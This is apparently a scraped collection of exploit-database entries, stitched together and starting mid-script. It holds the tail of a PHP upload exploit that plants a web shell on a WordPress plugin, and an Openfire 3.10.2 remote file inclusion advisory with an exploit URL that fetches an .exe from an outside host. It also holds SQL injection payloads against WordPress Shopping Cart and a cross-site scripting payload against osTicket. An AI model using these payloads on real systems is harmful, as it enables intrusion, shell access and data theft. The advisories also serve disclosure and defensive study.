curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


Shell Access :
http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-RFI.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).


Vulnerability Type:
=================================
Remote File Inclusion



CVE Reference:
==============
N/A





Vulnerability Details:
=====================

In "available-plugins.jsp" there is no validation for plugin downloads,
allowing arbitrary file downloads
from anywhere on the internet.

On line 40: all that needs to be satisfied is the paramater is not null.

boolean downloadRequested = request.getParameter("download") != null;
String url = request.getParameter("url");


If the above condition check returns true, the application downloads
whatever file you give it.

line 54:

    if (downloadRequested) {
        // Download and install new plugin
        updateManager.downloadPlugin(url);
        // Log the event
        webManager.logEvent("downloaded new plugin from "+url, null);
    }




Exploit code(s):
================

1) download arbitrary filez

e.g.

http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe

Our RFI will be downloaded to "openfire\plugins" directory.




Disclosure Timeline:
=========================================================
Vendor Notification:  NA
Sept 14, 2015  : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+]  GET


Vulnerable Product:             [+]  Openfire 3.10.2


Vulnerable Parameter(s):        [+]  download, url


Affected Area(s):               [+]  Server


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/57101/info

The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1
HireHackking 
source: https://www.securityfocus.com/bid/57101/info
 
The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1
HireHackking 
source: https://www.securityfocus.com/bid/57111/info
 
osTicket is prone to multiple input-validation vulnerabilities including:
 
1. Multiple cross-site scripting vulnerabilities
2. An open-redirection vulnerability
3. Multiple SQL-injection vulnerabilities
 
An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
 
osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.

http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22